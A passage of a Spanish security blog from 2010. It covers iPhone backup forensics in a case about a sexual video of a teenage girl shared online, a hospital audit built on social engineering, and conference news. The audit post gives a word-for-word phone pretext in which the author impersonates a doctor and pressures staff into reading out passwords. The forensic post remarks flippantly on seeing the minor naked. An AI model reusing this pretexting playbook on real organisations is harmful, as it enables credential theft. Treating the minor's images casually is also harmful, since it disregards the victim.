Lo primero y lo más sencillo es buscar ficheros con extensión M4a, M4v, MP4 y MOV. Tras un buen rato de búsqueda ha encontrado unos 30 ficheros con extensión MOV (En resumen os diré que ninguno de ellos pertenecía al vídeo que buscamos) por lo tanto nos tenemos que aplicar y estudiar más a fondo.

¿QUE HAY QUE SABER?

Para la búsqueda de imágenes y después de documentarme en la web de Apple, veo que los formatos de imágenes se componen (entre otros) de una serie de ficheros con la siguiente extensión:

Ficheros ITHMB: Contiene la galería (carrete) de imágenes
Ficheros BTH: Son archivos de datos BATHY Recorder.
Ficheros THM: Es utilizado por muchas aplicaciones diferentes para almacenar miniaturas.
Ficheros THL Es utilizado para las imágenes de los iconos
Ficheros THP: Son ficheros de vídeo muy utilizados en la Gamecube de Nintendo

Por lo tanto voy a la búsqueda de estos ficheros con el consiguiente resultado:

Solo dos ventanas me ofrecen resultado, la superior derecha con los resultados de ficheros HTM y la inferior derecha con un temporal del fichero ihtmb. ¡¡Vamos a ello!!

Tras un tiempo descarto los ficheros HTM , nada que ver con lo que busco, pero sin embargo el fichero ithmb me va a dar mucho juego

¡¡VEAMOS!!

Como decíamos estos ficheros contienen la galería (carrete) de imágenes, tras abrirlo con el editor hexadecimal sale en exceso mucha basura y por lo tanto no veo nada importante.

Googleando me encuentro una utilidad 'iThmbConv.exe' que extrae el contenido de estos ficheros sacando las miniaturas, quizás esta utilidad me ayude:

Y que es lo que ven mis ojosssssss; Eh Voilà!! Una miniatura. Esta me está dando en el nombre del archivo un dato muy revelador

Ya tengo una evidencia (que no la prueba). El fichero se llama IMG_0221.HTM, eso significa que el vídeo está asociado a ese fichero, por lo tanto sé que el vídeo tendrá en su nombre final del fichero el número 0221 y la extensión .MOV (*0221.MOV) por lo tanto si existe el fichero HTM, es posible que existiera en algún momento el vídeo, por lo tanto ¿Y si a este chico le dio por borrar el fichero?

Voy a proceder a intentar recuperar el fichero borrado, para ello me baso en mi kit de herramientas y que mejor...que mi famoso 'Recuva'. Tras una hora más o menos, consigo ver el resultado

¡¡ Aquí esta!!. Una vez recuperado procedemos a ver si se visualiza.

Perfecto se visualiza. Ya tenemos la prueba.

Es hora de recopilar información y hacer el pertinente informe. Nos vamos a otro caso.

Te puede pasar a ti...(Forensics Iphone) PARTE I

2010-04-13T17:45:00.000+02:00

Hola lectores,

Silvia y Mirian son unas adolescentes de 13 y 14 años respectivamente. A estas edades las hormonas se disparán y todo es color brillante y rosa. También como es habitual los fines de semana quedan en casa de Miriam para realizar una fiesta y tomar 'copas' en el jardín (como dicen los mas jovenes botellon privado). Allí se juntan con un grupo de chicos de su instituto y conforme pasan las horas y la ingesta de alcohol todo sube de tono. Que si un besito, que si te toco un poquito, etc.

El caso es que la cosa se desmadra y Silvia desaparece con dos chicos por el jardín. Pasado un rato y todo de buen rollo, se intercambian los números del móvil y se van a casa y aquí no ha pasado nada.

El caso resumiendo es el siguiente, Silvia fué grabada (¿sin saberlo?) desde un teléfono móvil en actitudes podríamos decir poco decorosas. En el instituto todo el mundo habla de que existe un un link de acceso a una descarga del vídeo desde Rapidshare (desde luego sin contraseña y a disposición de todo el mundo).

A estas estas edades todo se sabe y empieza a correr el rumor por el Instituto donde Silvia y Mirian estudian. Los profesores alertados por el problema deciden hablar con la chica y con sus padres. El caso se denuncia en la comisaría más próxima. Los padres acusan a los dos chicos de abusar de la chica (en el juicio quedo patente que fué consentido) y quieren que se requise todas las pruebas posibles que incriminen a los chicos. Curiosamente el móvil (un iphone, ¡¡con 14 años y ya tienen iphone!!) ha desaparecido. Esto cabrea a los abogados de los padres y alegra al buffete de abogados de su defendido, dado que no existiendo la prueba, no hay evidencia y por lo tanto es muy difícil mantener la acusación, como siempre en estos casos siempre prevalece la presunción de inocencia del acusado.

El Juez, decide aplazar el juicio a petición de los abogados de los padres para que se haga un análisis de los equipos y soportes informáticos que los chicos tengan en sus casas.
En el caso de que existiera el iphone disponemos de medios muy potentes en productos como cellebrite, Oxygen o Paraben, pero extremadamente caros para el común de los mortales. Por otro lado existen diversas técnicas que aunque mas rudimentarias nos aportan algo más de enseñanaza para un análisis forense.

Tras el previo análisis de uno de los ordenadores de los chicos, nos fijamos que dispone de iTunes, cosa muy importante dado que podremos obtener mucha información en el ordenador siempre que este hubiera sincronizado o hubiera realizado una copia de seguridad con el iphone.

En este caso vamos a ver como se ha resuelto.

El funcionamiento de sincronización de iTunes se basa en un controlador especifico en Windows y Mac que permite la comunicación segura entre ambos dispositivos, cuando se sincronizan o se hace una copia de seguridad, Windows almacena estos datos en un formato especifico de ficheros(si disponemos de la última versión del firmware) llamados mddata y mddinfo

Entre las cosas que sincroniza o se hacen copias de seguridad están:

Marcadores, cookies, historial y páginas abiertas actualmente del navegador
Marcadores, búsquedas recientes y la ubicación actual de mapas en Mapas
Ajustes, preferencias y datos de las aplicaciones
La Agenda y los favoritos de la Agenda
Cuentas de Calendario
Fondos de pantalla
Notas
Historial de llamadas
Cuentas de Mail
Favoritos de YouTube
Mensajes SMS
Correcciones sugeridas guardadas (se guardan automáticamente cuando las rechazas)
Carrete (fotos y capturas de pantalla tomadas con el iPhone)
Identificador del buzón de voz visual (no se trata de la contraseña del buzón de voz visual, pero se utiliza para validar la conexión. Sólo se restaurará a un teléfono que tenga el mismo número en la tarjeta SIM).
Clips web
Ajustes de red (puntos de acceso Wi-Fi guardados, ajustes de VPN, preferencias de red)
Dispositivos Bluetooth enlazados (sólo se pueden restaurar al mismo teléfono que realizó la copia de seguridad)
Llavero (incluye las contraseñas de las cuentas de correo electrónico, las contraseñas Wi-Fi y las que introduces en sitios web y algunas otras aplicaciones. El llavero sólo puede restaurarse a partir de una copia de seguridad al mismo iPhone o iPod touch. Si estás restaurando a un dispositivo nuevo, tendrás que volver a introducir esas contraseñas de nuevo)
Configuraciones/perfiles gestionados
Lista de fuentes de sincronización externas (MobileMe, Exchange ActiveSync)
Configuraciones de cuentas Microsoft Exchange
Entrenamientos y ajustes de Nike+iPod guardados
Datos de las aplicaciones de la tienda App Store (excepto la aplicación propiamente dicha y sus carpetas tmp y Caches)
Vídeos en el carrete
Preferencias de aplicaciones que permitan el uso de los servicios de ubicación
Caché/base de datos de aplicaciones web sin conexión
Notas de voz
Autorrelleno para páginas web
Servidores de confianza con certificados que no se puedan verificar
Sitios web con autorización para obtener la ubicación del dispositivo
Compras in-app (en aplicación)

Estas copias se guardan dentro de la carpeta del usuario, el directorio sería:

Mac: ~/Librería/Application Support/MobileSync/Backup/
Windows XP: \Documents and Settings\(nombredeusuario)\Application Data\Apple Computer\MobileSync\Backup\

Vista / Win 7: C:\Users\(nombredeusuario)\AppData\Roaming\Apple Computer\MobileSync\Backup\

En el caso que nos trata 'el chico' tiene en su ordenador Windows Vista y en el contenido del directorio nos encontramos la siguiente carpeta "0387fecb24b358ec337ab2ad3323fb8e0bbc27ca".

Cuando el dispositivo se conecta por primera vez a iTunes y nunca estaba conectado anteriormente, iTunes generará un identificador alfanumérico 40 caracteres para el dispositivo. Este identificador, también conocido como el UDID (Unique Device Identifier), es también el nombre de la carpeta para este dispositivo dentro de la carpeta de copia de seguridad.

En el caso en concreto tenia más de una y tuve que ordenarlas por fecha para distinguirlas,también es conveniente realizar una copia de esta carpeta en el escritorio u otro dispositivo, para trabajar desde ella y no correr el riesgo de perderla. (es recomendable hacer un hash del contenido del directorio). Los ficheros que contiene pueden ser del siguiente formato:

TIPOS DE FICHEROS

plist
mdbackup
mddata
mdinfo

Archivos plist

Los archivos plist son archivos informativos donde se escribe el contenido en XML.

Hay 3 plist principales archivos generados como parte del proceso de copia de seguridad - Info.plist, Status.plist y Manifest.plist.

El archivo plist más importante es el archivo Info.plist ya que contiene información básica sobre el dispositivo, incluido el, nombre de dispositivo asignado por el usuario número de serie y número de teléfono. El info.plist también indicará la última fecha y la hora cuando el dispositivo fue copiado en el proceso de copia de seguridad.

archivo plist

El archivo Status.plist indica el estado del proceso de sincronización anterior o copia de seguridad. Si la sincronización o el proceso de copia de seguridad se completó correctamente, entonces el contenido indicaría que el backup se ha realizado correctamente.

El archivo Manifest.plist es un archivo binario plist real de los archivos de la copia de seguridad junto con la firma digital. Generalmente, este archivo no es de importancia forense.

Archivos mdbackup

Los archivos mdbackup también contiene datos importantes siendo el propio nombre de archivo es un valor hexadecimal alfanuméricos. En las versiones de firmware más recientes para el iPhone, los archivos. mdbackup se sustituye por la mddata.y mdinfo . A diferencia del mdbackup que todo el archivo contiene los metadatos en la nueva versión de firmware va a crear dos archivos - uno con la extensión mddata y el otro con la extensión mdinfo. El. mdinfo y mddata actuan como un igual y, por tanto, tienen el mismo nombre de archivo, pero las extensiones de archivo diferentes.

Archivos MDINFO y MDDATA

El mdinfo contendrá la información de metadatos sobre el archivo,como por ejemplo, la libreta de direcciones, SMS, historial de llamadas, etc. El mddata contendrá el contenido real de ese archivo. También hay que tener en cuenta que estos ficheros se pueden cifrar desde el propio programa de Itunes, (este no es el caso) y si así fuera se complicaria el análisis forense

¡¡EMPEZAMOS!!

Como hemos comentado anteriormente disponemos de una carpeta llamada '0387fecb24b358ec337ab2ad3323fb8e0bbc27ca' que contiene los ficheros a buscar. En la investigación me voy a centrar en los SMS's por ver si ha mandado algún mensaje a otro chico, indicando la posibilidad de que se descarge el vídeo y también voy a ver si contiene el vídeo en cuestión en el ordenador.

Algunos ficheros 'mddata' en sus metadatos tienen una estructura basada en SQLite. Para buscar que ficheros son los del SMS's y llamadas, voy a recurrir a la utilidad 'grep' (para windows) y voy a buscar un patron que suelen estar en la estructura de ficheros.

Patrones de búsqueda:

sms.db: SMS
call_history.db: Historico de llamadas
notes.db: Agenda y notas

En la siguiente pantalla se ha realizado en tres ordenes para el entendimiento del lector (se podría hacer en una línea)

Como podemos observar devuelve tres ficheros con extensión .mdinfo, como ya hemos dicho anteriormente a cada fichero .mdinfo le corresponde su fichero de igual nombre pero con extensión .mddata . Vamos a comprobar si realmente tiene un formato SQLite, para ello lo abrimos con un editor Hexadecimal y este es el resultado:

Se aprecia que es SQLite 3 y además se ve algún fragmento de texto de un SMS. Para que sea más sencillo su uso los vamos a tratar con SQLite Administrator para ver la información que contienen.

Este es el resultado del primer fichero 3d0d....:

Los datos se han truncado por motivos confidenciales, pero se ven tres columnas relativas al número de móvil que se envía, la fecha y el texto.

En la siguiente pantalla y tras una búsqueda nos da un mensaje revelador. Tenemos la evidencia relativa de que 'algo' se ha subido a internet....

Según se trata es filestube y no rapidshare (o son ambos), eso significa que el vídeo en cuestión sigue en circulación. Vamos a comprobar si somos capaces de encontrarlo en internet en base a una búsqueda de este patron en los ficheros .mddata, para ello empleamos la siguiente sintaxis:

grep -l "

Tras una búsqueda en múltiples ficheros damos con el resultado. Nota: se han trucado algunos datos

Si accedemos a la web vemos a la chica tal y como vino al mundo...

En el siguiente post veremos si el vídeo esta en el equipo y que medios utilizamos para verificarlo.

YJ

2010-04-08T10:09:00.001+02:00

En la pasada Rooted lo conocí de primera mano, YJ es una persona increíble, un hacker de los de antes, un hacker blanco (o quízas algo gris, con un pasado 'under' que siempre es interesante) que escribe en un blog muy importante y que no voy a decir aquí por su dificultad en la traducción 'seguridadpordefecto' u algo así, ;-) (los maños lo decimos de otra forma 'u te securizas u a tomar pol culo'...)

Cosas que pasan...esta es mi historia con el...

Yago..(joder..la jodí di su nombre) es un maño emigrado a Madrid, una persona de esas con principios, cosas que ya son difíciles de ver en las personas...cuando lo conocí no nos cantamos jotas, pero es de esas personas que en las fiestas del pilar comparten litronas sin saber quien eres y eso marca la diferencia.

Su calidad técnica es incuestionable y en 'la noche me confunde en Madrid' lo demostró, compartimos hackeos memorables, técnicas de intrusión y algun exploit tipo 0 Day como 'brute force girls'...(si este post lo lee su novia, que este tranquila a YJ le falta el shellcode, y se paso todal noche /dev/null)

Nos hizo de experto (muy experto) pero eso sí con caballerosidad , como muy buen maño, sin ansia viva, y con conocimiento del medio. Vivimos momentos buenos y proyectos en los que está inmerso muy, muy chulos e interesantes.

Volviendo al experto, al hacker blanco...YJ es el autor de muchas de las tools que tengo en mi caja de herramientas, entre ellas , PATRIOT, UNHIDE (anda que no me ha venido bien esta tool)..y un huevo más..que espero siga desarrollando.

También tuve el honor de conocer a los demás integrantes de ese blog famoso, (aunque a Alejandro Ramos ya lo conocía de otras guerras ;-) )

En ese blog tan famoso lo componen el propio YJ, Alejandro Ramos, (Tío, siento no poder ayudarte en el reto, otra vez será, pero cuento contigo para unos proyectos de PUT.MDR.), José A. Guasch, (un crack en esto de la seguridad, hace tiempo, mucho tiempo que el tío se lo curra muy bien), Laura García, (Un encanto de señorita, que sabe un huevo y lo tiene muy claro ¡¡ una mujer en seguridad!! o diossss, milagro), Lorenzo Martinez, (Autentico gurú de la seguridad perimetral y networking, y ademas lo confirmo de verdad, otro de los maestros).

Ya se que este post no es técnico pero habla de ellos, que gracias a sus noticias interesantes y sin ánimo de lucro ayudan a muchas personas a iniciarse y continuar en el mundo de la seguridad.

HOSPITAL (Parte 1 - Ingeniería social)

2010-04-08T00:18:00.003+02:00

DISCLAIMER:

Hola esta serie de entradas que veréis en las próximos días han sido aceptados para su difusión por parte del Hospital que nos contrato para esta auditoria.

Como veréis han sido eliminados nombres y datos que consideramos confidenciales, de todas formas agradeceremos que si nos colamos en algo nos lo hagáis saber.

La utilidad de este post y los siguientes creo que viene dado porque hemos realizado algo que es muy poco común en las auditorias entre ellas Ingeniería social y otros métodos poco comunes, eso si, todo ello con objeto de que aprendamos todos, yo también incluido.

***************

EMPEZAMOS

**************

Hola lectores,

Tal y como comente en el post anterior vamos a mostrar en diferentes entradas del blog la revisión del estado del arte de la seguridad de un Hospital .

Todo nace hace aproximadamente a mediados de Enero cuando el Consejo de Administración de este hospital (entenderéis que no de nombres) se da cuenta de una fuga importante de datos de pacientes y robo de material informático.

Tras una somera revisión por parte de los informáticos del centro se concluye que la desaparición consiste en diversos discos duros (pendrives), cintas de backup y dos portátiles. Ni que decir tiene que prácticamente se llevaron la información de la empresa.

Tras hablar con los responsables técnicos y el presidente del Consejo de Administración, se nos da vía libre para realizar una revisión que yo la clasifico como 'brutal' por el alcance que tiene dado que entre las revisiones típicas de seguridad, en esta ocasión vamos a emplear técnicas de ingenieria social.

Nuestro objetivo en esta primera parte de la auditoria consistía en tres elementos básicos:

1.- Obtener el máximo de información, de forma telefónica, suplantando la identidad de un conocido doctor del centro, esto incluye obtener perfiles, y contraseñas

2.- Obtención de accesos reservados solo para empleados, es decir acceso a diversas partes del portal de empleado (web)

3.- El paso más importante y divertido de la revisión, hacernos pasar por médicos del centro y acceder a zonas reservadas, entre ellas el CPD. Evidentemente queríamos comprobar los elementos de seguridad física del centro.

Para ello lo más sencillo y tras disponer de la autorización del consejo (en contrato y por escrito) nos disponemos a comenzar buscando en Google. En este ejemplo (que no es el caso que estamos tratando) proporciona tanta información a un supuesto atacante, que básicamente tiene todo el mapa de red. Cuidado con lo que se publica por internet

Ejemplo de google:

http://www.networkworld.es/La-sanidad-camina-con-Wi-Fi:-Hospital-de-La-Morale/seccion-/articulo-177043

Casi el 100% tiene publicado en su web la lista de médicos especialistas en la propia web corporativa de la empresa. Nosotros la obtenemos de otra web con objeto de no dejar rastro de IP's.

Nuestro objetivo es disponer de personalidades importantes dentro del hospital, para ello y no complicarnos la vida seleccionamos un conocido psicólogo del centro, (al cual ya pedimos perdones y excusas cuando finalizamos el trabajo.)

He aquí que me hago pasar por el excelentísimo Doctor Juan Aguirre (nombre falso en este post) ( por cierto Eduardo será el doctor en persona quien se persone en el centro, pero eso en la siguiente entrada)

Lo primero es llamar desde una cabina de teléfono (no vamos a dejar rastro de centralitas ni números personales ni nada de nada), también pensamos hacerlo desde un locutorio de esos que tantos existen.

NOTA: Tenemos la conversación grabada

Vamos a llamar al 'call center' 902 34 XX XX XX...

.- (operadora) Hola buenas tardes le atiende María, ¿en que le puedo atender?

.- (Yo) Humm. Hola buenas tardes soy el doctor Aguirre, responsable del área de psicología del centro.

.- (operadora) Ah, esto, hola Sr. Aguirre, ¿que desea?

.- (yo) Mira estoy en un congreso en aquí en Madrid en el San Antonio Breast Cancer Symposium, necesito recuperar un fichero del portal web y no recuerdo la contraseña.

http://www.congresos-medicos.com/congresos/conclusiones-del-32nd-san-antonio-breast-cancer-symposium-4380

.- (operadora) Ya ¿y no lo tiene anotado? (empiezo a alucinar, ¿anotado?),

.- (Yo) estooo ¿debería?, lo siento pero no. ¡¡ Señorita es muy urgente empiezo la conferencia en 35 minutos!!

.- (operadora) Es que no le puedo dar esta información por teléfono, lo siento

.- (Yo) (un poco borde lo se) ¡¡ Oiga, no se quien es usted pero necesito la contraseña YA!!, el éxito del centro depende de los datos que de y si usted no me lo proporciona, tendré que hablar con su responsable, por favor pongámonos al habla con el ahora mismo, ya!!

.- (operadora), Escuche señor, es imposible, no le puedo dar esos datos.

.- (yo) (mas borde), Mire ¿como dijo que se llama? ¿María?, me caguen la hostia si no me da ahora mismo esa contraseña, le hago culpable si no puedo tener esos datos ahora mismo, mire mi curriculum y mis datos dentro de portal, si quiere le digo mi DNI (ahí fue arriesgado, pero dudo que esos datos estén en el portal), si quiere le digo mi número de colegiado (ahí si que me pase).

.- (operadora) (muy compungida...pobre), Espere que pongo el manos libres y le paso con la responsable del servicio...(unos 40 segundos de espera)...

.- (responsable) Hola Doctor Aguirre, perdone por la espera, mi nombre es Lucia ¿donde dice que esta?

.- (yo) Señorita, estoy desesperado estoy en en el San Antonio Breast Cancer Symposium, compruébelo en mi agenda personal. (Aquí se acabo todo ,pensé)

.- (responsable) Lo siento, perdone no tengo acceso a su agenda, pero lamento todo y no se preocupe tome nota (¿que tome nota?) . La contraseña de su acceso a la red (vpn) es 'aguirre5656' y el acceso al portal es '5656aguirre'. De todos modos le informo que la conversación ha sido grabada por nuestros sistemas informáticos y que a su vuelta le será verificado por el sistema. (por cierto contraseña muy rebuscada)

.- (yo) (sin entender nada de lo que ha dicho)..uhmm gracias, señorita ha sido muy amable, da gusto el servicio prestado.

.- (responsable) Gracias buenas tardes.

Llegados a este paso solo nos queda configurar el acceso a la VPN (cosa muy sencilla dado que en su página web pública (craso error) explica como se realiza para todos los médicos interinos, y médicos asociados)

Una vez configurado el acceso por SSL con Open VPN, esto es lo que tenemos...

Pero esto lo vereis en el blog de eduardo

¡¡Semifinalistas!!

2010-04-05T11:25:00.001+02:00

Hola lectores,

Independientemente de que en los próximos días saldrá publicado la entrada de la mega auditoría del Hospital, quería comunicaros que mi amigo "Juanito" (alias "silverhack", del famoso blog de el diario de juanito ) y yo mismo, hemos participado en un reto forense en el que hemos quedado semifinalistas y como dice juanito, no está mal para haberle dedicado un par de tardes.

Este reto está enmarcado en el "Network Forensics Puzzle Contest" de la prestigiosa firma de SANS y mas concretamente en el apartado "Computer Forensic Investigations and Incident Response Blog"

Los resultados técnicos y el 'making off' de las pruebas las tendréis en el propio blog de silverhack, el cual se ha comprometido a poner varias entradas sobre este tema.

Estaros atentos!!!

2010-03-26T10:19:00.001+01:00

Hola lectores,

Hace un tiempo hemos realizado una revisión de seguridad en un famoso hospital privado. Los resultados han sido sorprendentes y alucinantes por la forma como lo hemos realizado.

Las conclusiones son espectaculares. Hemos conseguido:

- Ingeniería social: contraseñas, acceso a sitios para personal autorizado, ...(esta fué la parte más divertida)
- Seguridad física: acceso al CPD, robo de discos duros con backups, tarjetas RFID, ...
- Fuga de información: expedientes médicos, bases de datos de pacientes,procedimientos de backup, ...
- Control total de los PCs de los administradores y de la DMZ, control del software del propio hospital...

Publicaremos los resultados paralelamente aquí y en el blog de Eduardo Abril.

¡¡Así que estaros atentos !!

¡¡ Gracias a todos !!

2010-03-22T10:47:00.000+01:00

Se acabo la Rooted Con 2010.

Han sido unos días increibles, con un nivel técnico alucinante, una organización a la altura de los grandes eventos internacionales y que nada tiene que envidiar.

Las fiestas, las cervezas consumidas y demás networking de pasillo ha sido de lo más gratificante, hemos compartido, puesto cara a los nicks y como no algún que otro intercambio de conocimientos.

Hemos aprendido muchísimo e incluso se me ha quedado corto el magnifico evento

Gracias a la organización y a todos aquellos que estuvisteis en mi charla, fué muy gratificante estar con todos vosotros.

Tuve la suerte de que la cadena de TV cuatro me hiciera una mini entrevista, que esta pendiente de salir. Por otro lado también salgo (de refilón) en Antena3 y en otro reportaje de la cuatro, (pronto saldré en Hola y en Salvame de Luxe).

Cobertura sobre el evento:

http://www.cuatro.com/noticias/videos/piratas-informaticos-dan-cara/20100319ctoultpro_12/

http://www.antena3noticias.com/PortalA3N/ciencia-y-tecnologia/Las-grandes-empresas-contratan-hackers-para-protegerse/10220625

Empieza la Rooted Con 2010

2010-03-18T08:08:00.000+01:00

Hola lectores,

Hoy comienza la primera edición del congreso de seguridad Rooted Con.

Más o menos sobre la 13:00 de la tarde impartiré una conferencia sobre 'autopsia de una intrusión'.

Podréis seguir toda la información referente al congreso mediante el hashtag de twitter #rooted2010 especialmente creado para esta Rooted CON 2010.

¡¡ Nos vemos !!

Todo se guarda...

2010-03-02T17:32:00.000+01:00

Hola lectores,

En una conferencia en Palma de Mallorca me preguntarón si las fuerzas del estado (en España) monitorizaban tipo SITEL las conversaciones telemáticas del tipo correos electrónicos, chats, foros, etc.

Ni que decir tiene que NO. Esa información por ley Española la suelen guardar las operadoras o proveedores de servicio, que tras orden judicial proporcionan la información a las fuerzas del estado que lo requieran.

No obstante en otros países como Alemanía, los servicios secretos de este país, hasta ahora podían seguir grabando conversaciones privadas o conexiones de Internet y almacenándolas durante meses sin permiso previo de un juez, como venían haciendo hasta ahora en aras de la seguridad nacional. No obstante el constitucional de este país ha prohibido tajantemente la grabación o almacenamiento de esta información privada.

El caso es que todo o casi todos los datos que circulan por la red son almacenados en algún momento por las operadoras de servicios o empresas. Estas pueden proporcionar un 'framework' de acceso vía web o webservices para que sean las propias fuerzas policiales quienes exploten está u otra información que venga avalada por orden judicial.

La cuestión (ya planteada y exigida anteriormente por la AEPD) es que no queda claro el concepto de retención de datos ni la política de estas operadoras o empresas de servicios, tampoco que es lo que se guarda. Por otro lado la web Cryptome publicaba una especie de manual, en la que describen cómo Microsoft guarda datos privados de los usuarios que acceden a servicios 'online' como MSN Messenger, Windows Live y Xbox Live, y cómo esos datos se ponen a disposición de las autoridades de EEUU cuando son requeridos.

Esto no hizo mucha gracia a Microsoft y puso una demanda (hoy desestimada) para el cierre cautelar del sitio web Cryptome (ver noticia)

Cryptome es una web que dispone de documentos que esta prohibidos por los gobiernos de todo el mundo, en particular el material de la libertad de expresión, la privacidad, la criptografía, las tecnologías de doble uso, la seguridad nacional, inteligencia, y el gobierno secreto.

Aquí dejo algunos documentos que me han parecido interesantes desde el punto de vista forense o técnico y que cada uno saque sus propias conclusiones.

Documento de la discordia: microsoft-spy.zip

Documentos sobre Windows 7 relativos a privacidad

http://cryptome.org/isp-spy/win7-spy.zip

Otros documentos:

facebook-spy.pdf

skype-spy.pdf

yahoo-preserve.pdf